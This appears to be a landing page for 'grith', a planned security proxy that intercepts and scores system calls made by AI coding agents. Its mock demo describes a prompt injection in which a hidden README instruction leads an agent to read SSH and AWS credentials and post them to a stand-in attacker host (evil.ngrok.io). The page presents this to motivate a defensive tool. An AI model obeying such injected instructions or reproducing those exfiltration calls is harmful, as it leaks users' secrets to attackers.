Launching Soon

Your AI Agent Has Full Access to Your Machine

Every file read, shell command, and network call — unmonitored. grith intercepts every system call from any AI coding agent and evaluates it against 17 independent security filters before execution. Wrap any CLI tool with grith exec.

Request Early Access Read the Blog

grith security proxy

$ grith exec -- claude-code

→ Intercepting system calls...

fs.read("~/.ssh/id_rsa")

├─ path_match: SENSITIVE +4.0

├─ taint_track: EXFIL_RISK +3.5

└─ composite: 7.5 → AUTO-DENY ✕

✓ Threat blocked. Agent continued safely.

Syscall Interception17 Security FiltersCLI SupervisorModel AgnosticLocal-FirstOpen Source · AGPL v3

CVEs in AI-Powered IDEs

IDEsaster Research

Exploitation Rate

IDEsaster Research

Breach Alerts Ignored

Verizon 2024 DBIR

Exposed Instances

ClawHavoc Attack

Real Attack Scenario

This Is What Prompt Injection
Looks Like in Practice

A malicious README tells your agent to exfiltrate SSH keys. No prompt, no alert — unless grith is watching.

Without grithCompromised

$ agent "review this repo"

# Agent reads README.md with hidden injection

→ Reading project files...

→ Analysing codebase...

fs.read("~/.ssh/id_rsa")

fs.read("~/.aws/credentials")

net.post("https://evil.ngrok.io/collect",

body: { ssh_key, aws_creds })

⚠ Credentials exfiltrated to attacker server.

No alert was raised. No prompt was shown.

With grithProtected

$ grith exec -- agent "review this repo"

# Same repo, same hidden injection

→ Reading project files...

→ Analysing codebase...

fs.read("~/.ssh/id_rsa")

├─ path_match: +5.0

├─ taint_track: +3.0

└─ composite: 8.0 → AUTO-DENY ✕

✓ Attack blocked. Logged to audit trail.

Agent continued safely on remaining tasks.

How It Works

Intercept. Score. Decide.

Three-step pipeline, under 15ms. Works with any CLI agent — no modification needed.

Intercept

Wrap any CLI tool with grith exec. OS-level syscall interception captures every file open, network connection, and process spawn. No agent modification required.

Works with:

Claude Code, Codex, Aider, Cline, Open Interpreter, Goose — any CLI tool

Score

17 independent security filters evaluate each operation in parallel across three phases. Path matching, secret scanning, taint tracking, behavioural profiling, destination reputation — producing a composite score.

Phase 1 <1ms — static checks (6 filters)

Phase 2 ~3ms — pattern matching (5 filters)

Phase 3 ~5ms — context analysis (6 filters)

Decide

Composite score routes each call: auto-allow, queue for review, or auto-deny. Ambiguous calls are batched into a quarantine digest — reviewed on your schedule, not one-by-one.

80-90% auto-allowed

5-15% queued for digest review

1-5% auto-denied and logged

Developer Experience

What Developers Actually See

After every agent session, a clear summary. No digging through logs.

Session Summary

Session complete — 47 actions │ $1.40 │ 96% allowed

Tool calls: 47 Provider: Anthropic

├─ file_read 22 Model: Claude Sonnet

├─ file_write 12 Duration: 12m 08s

├─ shell_exec 9 Cost: $1.40

└─ net_request 4

Security: Quality:

├─ Allowed 45 (96%) ├─ Build ✓

├─ Queued 2 (4%) ├─ Tests ✓

└─ Denied 0 └─ Errors 0

Quarantine Digest

2 items pending review

1. shell_exec("npm install lodash")

Score: 4.2 │ new dependency install

Context: refactoring utils/helpers.ts

[a] approve [d] deny [l] learn

2. net.get("registry.npmjs.org/lodash")

Score: 3.8 │ outbound to new domain

Context: verifying package metadata

[a] approve [d] deny [l] learn

Analytics & Compliance

Analytics, Audit Trails &
Compliance — Built In

Every tool call logged. Every decision traceable. From cost tracking to enterprise compliance.

◈

Cost Tracking

Per-session, per-model, per-provider cost breakdowns. Set budgets, get alerts before overruns.

⊞

Full Audit Trail

Structured JSON logs for every tool call: what was requested, which filters fired, the composite score, and the decision.

⬡

Security Analytics

Decision split visualisation, filter hit rates, anomaly trends, and behavioural baselines over time.

◇

Compliance-Ready Audit Trail

Structured audit data designed to support SOC 2, NIST AI RMF, and HIPAA reporting. Deterministic execution traces auditors can read.

SOC 2NIST AI RMFHIPAAEnterprise (planned)

⎔

SIEM / SOAR Export

Export AI agent security telemetry via webhook and JSON for integration with your existing monitoring stack. Treat AI agent actions like any other security event.

WebhookJSONOpenTelemetry (planned)Enterprise

Teams & Enterprise

Built for Teams.
Ready for Enterprise.

From two developers sharing a policy to 500 engineers with SSO, RBAC, and air-gapped deployment (Enterprise, planned).

New

Unified AI Key Management

Add your Claude, OpenAI, OpenRouter, and other API keys to the grith dashboard once. Team members log in to Pro and use any model — no credential sprawl.

New

Approval Channels

Quarantine digest items routed to Slack, Telegram, web dashboard, or email. Approve, deny, or learn from any device.

Pro

Centralised Policy Management

Shared security filter configurations across your team. Update allowlists, scoring thresholds, and path rules from a single dashboard.

Pro

Team Dashboard & Usage Analytics

Per-developer cost, security score, and session history at a glance.

Enterprise

SSO / SAML, RBAC & Air-Gapped Deployment (Planned)

Planned for v2.0: single sign-on via Okta, Azure AD, or any SAML provider. Role-based access controls. Full air-gapped and VPC deployments.

Team Dashboard

API Keys

● Anthropic ···4a7f active

● OpenAI ···9c2e active

● OpenRouter ···1d8b low balance

Team Activity (Today)

sarah │ 3 sessions │ $4.20 │ 98%

james │ 5 sessions │ $8.10 │ 95%

priya │ 2 sessions │ $2.80 │ 91%

Pending Approvals

▸ priya · net.post(ext-api.io) score 5.2

via #security-reviews Slack ✓

Policy

Config: acme-corp-v3.toml

Auto-deny: 8.0

Escalation: #security-reviews

Comparison

No Other Agent Has
Native Security Architecture

The only open-source, model-agnostic tool with per-syscall security evaluation.

Capability	grith	Cline	Aider	Open Interp.	Claude Code	Codex
Per-syscall interception	✓	—	—	—	coarse	container
CLI supervisor	✓	—	—	—	—	—
Multi-filter scoring	✓	—	—	—	—	—
Quarantine digest	✓	—	—	—	—	—
Model agnostic	✓	✓	✓	✓	—	—
Local-first	✓	✓	✓	✓	—	—
Open source	✓	✓	✓	✓	—	✓
Cost tracking	✓	—	—	—	—	—
Analytics & compliance	✓	—	—	—	—	—
Unified AI key management	✓	—	—	—	—	—
Multi-channel approvals	✓	—	—	—	—	—

Coming Soon

Zero Trust Security for
Every AI Agent

Per-syscall interception, multi-filter scoring, and quarantine digests — for any CLI agent. Open source. Local-first. Launching soon.

Request Early Access Read the Blog

Syscall Interception17 Security FiltersModel AgnosticOpen SourceCLI Supervisor

Your AI Agent Has Full Access to Your Machine

This Is What Prompt Injection Looks Like in Practice

Intercept. Score. Decide.

Intercept

Score

Decide

What Developers Actually See

Analytics, Audit Trails & Compliance — Built In

Cost Tracking

Full Audit Trail

Security Analytics

Compliance-Ready Audit Trail

SIEM / SOAR Export

Built for Teams. Ready for Enterprise.

Unified AI Key Management

Approval Channels

Centralised Policy Management

Team Dashboard & Usage Analytics

SSO / SAML, RBAC & Air-Gapped Deployment (Planned)

No Other Agent Has Native Security Architecture

Zero Trust Security for Every AI Agent

This Is What Prompt Injection
Looks Like in Practice

Analytics, Audit Trails &
Compliance — Built In

Built for Teams.
Ready for Enterprise.

No Other Agent Has
Native Security Architecture

Zero Trust Security for
Every AI Agent